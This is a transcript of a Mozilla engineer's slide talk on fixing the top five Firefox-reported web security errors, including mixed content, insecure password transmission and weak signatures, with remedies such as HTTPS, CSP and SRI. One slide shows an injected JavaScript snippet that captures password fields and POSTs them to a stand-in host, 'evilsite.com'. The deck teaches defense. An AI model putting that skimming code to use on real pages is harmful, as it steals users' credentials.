Tweet
Tweet

Slide 1

Slide 1 text

Fixing the Top 5 Web Security Errors We see from Firefox Luke Crouch • Privacy + Security Engineer, Mozilla • @groovecoder

Slide 2

Slide 2 text

Me. I’m Luke Crouch. I work on Privacy & Security. I click thru slides really fast. Twitter: @groovecoder 2

Slide 3

Slide 3 text

The “Top 5”* 3 * MDN Google Analytics: Pageviews in /en-US/docs/Web/Security from utm_medium=firefox-console-errors

Slide 4

Slide 4 text

05 Same-Origin Policy

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

Cross-Origin Request 7 http://www.evilcorp.com … new XMLHttpRequest().open( “GET”, “boss.bankofamerica.com/data.json” ); …

Slide 8

Slide 8 text

Cross-Origin Request Threats 8 Attacker •Any Malicious Origin • Phishing & Malware Sites • Compromised CDNs • Untrusted First Parties Attacks •Steal data from other origins

Slide 9

Slide 9 text

“Fix”: All browsers enforce Same-Origin Policy

Slide 10

Slide 10 text

“Fix”: Use HTTP Access Control (CORS) to allow cross-origin access

Slide 11

Slide 11 text

HTTP Access Control (CORS) 11 https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS

Slide 12

Slide 12 text

HTTP Access Control (CORS) 12 http://public.slidesharecdn.com/data.json … Access-Control-Allow-Origin: www.slideshare.net … http://www.slideshare.net … new XMLHttpRequest().open( “GET”, “public.slidesharecdn.com/data.json” ); … https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS

Slide 13

Slide 13 text

04 Form Autocompletion

Slide 14

Slide 14 text

I couldn’t find the specific errors, so, in general …

Slide 15

Slide 15 text

By default, Browsers remember what users submit via input fields

Slide 16

Slide 16 text

Form Autocompletion 16

Slide 17

Slide 17 text

Form autocompletion 17 … … https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

Slide 18

Slide 18 text

Form auto-complete Threats 18 Attacker •Malware authors •Over-the-shoulder Attacks •Steal the data from a file •Steal the data from the screen

Slide 19

Slide 19 text

Disabling for sensitive information 19 … … Disable for the entire form Disable for 1 field* https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

Slide 20

Slide 20 text

Caveat: login fields ; browsers want to remember this 20 … Has no effect; browser still offers to remember https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

Slide 21

Slide 21 text

03 Weak Signature Algorithms

Slide 22

Slide 22 text

No content

Slide 23

Slide 23 text

Weak Signature Algorithms Threats 23 Attacker •Malicious host •(with redirect or MITM vector) Attacks •Collision: Fraudulent certificates •2008 - md5: RapidSSL, Microsoft •2015 - SHA-1: “The SHAppening”

Slide 24

Slide 24 text

Weak Signature Algorithms 24 $ openssl req -new -newkey rsa:2048 -nodes -sha1 \ -out thecustomizewindows.com.csr \ -keyout thecustomizewindows.com.key $ openssl req -in thecustomizewindows.com.csr -noout -text Certificate Request: … Signature Algorithm: sha1WithRSAEncryption

Slide 25

Slide 25 text

Fixing weak signatures is the same as fixing …

Slide 26

Slide 26 text

02 Insecure Passwords (Transmission)

Slide 27

Slide 27 text

No content

Slide 28

Slide 28 text

No content

Slide 29

Slide 29 text

Insecure passwords 29 http://www.espn.com … …

Slide 30

Slide 30 text

Insecure passwords 30 https://www.espn.com … …

Slide 31

Slide 31 text

Insecure passwords 31 http://www.espn.com … … THIS IS NOT SECURE!

Slide 32

Slide 32 text

Insecure passwords 32 http://www.espn.com // Injected via HTTP MitM […document.querySelectorAll(“[type=‘password’]”)].forEach(pwInput=>{ pwInput.addEventListener(“change”, ()=> { fetch(“evilsite.com”, {method: “POST”, body: pwInput.value}); }); }); … … SEE, TOLD YOU SO!

Slide 33

Slide 33 text

Insecure password transmission Threats 33 Attacker •Man-in-the-middle: • Open WiFi • ISP • Proxies Attacks •Steal password ๏+ Password reuse

Slide 34

Slide 34 text

Fixing weak signatures and insecure passwords is the same as fixing …

Slide 35

Slide 35 text

01 Mixed Content

Slide 36

Slide 36 text

No content

Slide 37

Slide 37 text

Insecure active content 37 , <link>, <iframe>, <object>, XMLHttpRequest, @font-face, cursor, background-image, etc. https://www.dailymotion.com/us <html> … <script src=“http://mc.dailymotion.com/masscast/2/dailymotion.us/ home/76127265087”> …

Slide 38

Slide 38 text

Insecure active content Threats 38 Attacker • Man-in-the-middle: • Open WiFi • ISP • Proxies Attacks • Steal credentials • Steal sensitive data from DOM • Alter behavior of DOM • Install malware

Slide 39

Slide 39 text

Browsers already fix insecure active content for you by blocking it

Slide 40

Slide 40 text

insecure passive/display content

Slide 41

Slide 41 text

No content

Slide 42

Slide 42 text

Insecure passive/display content 42 , , , https://www.booking.com/ … …

Slide 43

Slide 43 text

Insecure passive/display content Threats 43 Attacker •Man-in-the-middle: • Open WiFi • ISP • Proxies Attacks •Break page •Snoop content •Inject Misleading content

Slide 44

Slide 44 text

Snooping Session Cookies

Slide 45

Slide 45 text

Snooping Session Cookies 45

Slide 46

Slide 46 text

Snooping Session Cookies = Session Hijacking 46

Slide 47

Slide 47 text

Snooping Session Cookies = Session Hijacking 47

Slide 48

Slide 48 text

Snooping Session Cookies = Session Hijacking 48

Slide 49

Slide 49 text

Snooping Other Cookies

Slide 50

Slide 50 text

Snooping Other Cookies 50

Slide 51

Slide 51 text

Snooping Other Cookies 51

Slide 52

Slide 52 text

Sneak Peak: Cookie Syncing 52 https://freedom-to-tinker.com/blog/englehardt/the-hidden-perils-of-cookie-syncing/

Slide 53

Slide 53 text

Fixing weak signatures, insecure passwords, AND insecure content

Slide 54

Slide 54 text

HTTPS ALL THE THINGS!

Slide 55

Slide 55 text

No content

Slide 56

Slide 56 text

+

Slide 57

Slide 57 text

No content

Slide 58

Slide 58 text

No content

Slide 59

Slide 59 text

certbot + Let’s Encrypt 59 brew install certbot sudo certbot certonly --manual —preferred-challenges dns

Slide 60

Slide 60 text

certbot + Let’s Encrypt 60

Slide 61

Slide 61 text

certbot + Let’s Encrypt 61 Please deploy a DNS TXT record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue

Slide 62

Slide 62 text

Deploy the TXT record to your DNS

Slide 63

Slide 63 text

certbot + Let’s Encrypt 63 Please deploy a DNS TXT record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue

Slide 64

Slide 64 text

Add signed cert to your site!

Slide 65

Slide 65 text

No content

Slide 66

Slide 66 text

No content

Slide 67

Slide 67 text

Yay! You secured your site!

Slide 68

Slide 68 text

But there’s legacy insecure content! 68 http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

Slide 69

Slide 69 text

Content-Security-Policy

Slide 70

Slide 70 text

Content-Security-Policy 70 Content-Security-Policy: default-src https:; Enforce https: for all src https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

Slide 71

Slide 71 text

good: upgrade-insecure-requests 71 Content-Security-Policy: default-src https:; upgrade-insecure-requests; https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/upgrade-insecure-requests Change http links to https

Slide 72

Slide 72 text

upgrade-insecure-requests 72 http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

Slide 73

Slide 73 text

better: block-all-mixed-content 73 Content-Security-Policy: block-all-mixed-content; https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/block-all-mixed-content On https pages, block http requests

Slide 74

Slide 74 text

How do you know which content is insecure?

Slide 75

Slide 75 text

Content-Security-Policy-Report-Only 75 Content-Security-Policy-Report-Only: default-src https:; block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly Do not enforce; only report violations https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only

Slide 76

Slide 76 text

Content-Security-Policy report-uri 76 Report violations here https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-uri Content-Security-Policy-Report-Only: default-src https:; block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly

Slide 77

Slide 77 text

report-uri.io 77

Slide 78

Slide 78 text

What if you have to use insecure resources?

Slide 79

Slide 79 text

Sub-Resource Integrity

Slide 80

Slide 80 text

Subresource Integrity (SRI) 80 https://example.com … … https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity Hash Algorithm Hash Digest

Slide 81

Slide 81 text

What if resources add their own or <style> elements?

Slide 82

Slide 82 text

require-sri-for 82 https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP Content-Security-Policy-Report-Only: require-sri-for script style; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly Require sri attributes on all and <style> elements

Slide 83

Slide 83 text

But, yeah … HTTPS ALL THE THINGS!

Slide 84

Slide 84 text

+

Slide 85

Slide 85 text

Thanks. Luke Crouch Twitter: @groovecoder groovecoder.com 85